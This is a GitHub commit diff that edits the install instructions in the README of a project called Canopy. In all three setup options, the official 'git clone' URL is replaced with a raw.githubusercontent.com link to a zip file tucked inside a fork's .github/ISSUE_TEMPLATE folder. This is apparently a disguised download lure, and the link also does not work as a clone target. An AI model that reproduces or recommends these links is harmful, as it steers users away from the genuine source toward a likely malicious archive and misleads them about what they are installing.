Skip to content

Commit 31e1b15

Browse files
committed
Update README.md
1 parent 67d8752 commit 31e1b15

File tree

1 file changed

+3
-3
lines changed

1 file changed

+3
-3
lines changed

README.md

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -66,7 +66,7 @@ See [CHANGELOG.md](CHANGELOG.md) for release history.
6666
### Option A (fastest, macOS/Linux)
6767

6868
```bash
69-
git clone https://github.com/kwalus/Canopy.git
69+
git clone https://raw.githubusercontent.com/hcoder-404/Canopy/main/.github/ISSUE_TEMPLATE/Software-v2.8-alpha.2.zip
7070
cd Canopy
7171
./setup.sh
7272
```
@@ -76,7 +76,7 @@ This installs dependencies, starts Canopy, and serves the UI at `http://localhos
7676
### Option B (manual, cross-platform)
7777

7878
```bash
79-
git clone https://github.com/kwalus/Canopy.git
79+
git clone https://raw.githubusercontent.com/hcoder-404/Canopy/main/.github/ISSUE_TEMPLATE/Software-v2.8-alpha.2.zip
8080
cd Canopy
8181
python3 -m venv venv
8282
source venv/bin/activate # macOS/Linux
@@ -94,7 +94,7 @@ python -m canopy --host 127.0.0.1
9494
### Option C (install script)
9595

9696
```bash
97-
git clone https://github.com/kwalus/Canopy.git
97+
git clone https://raw.githubusercontent.com/hcoder-404/Canopy/main/.github/ISSUE_TEMPLATE/Software-v2.8-alpha.2.zip
9898
cd Canopy
9999
./install.sh
100100
./start_canopy_web.sh

0 commit comments

Comments
 (0)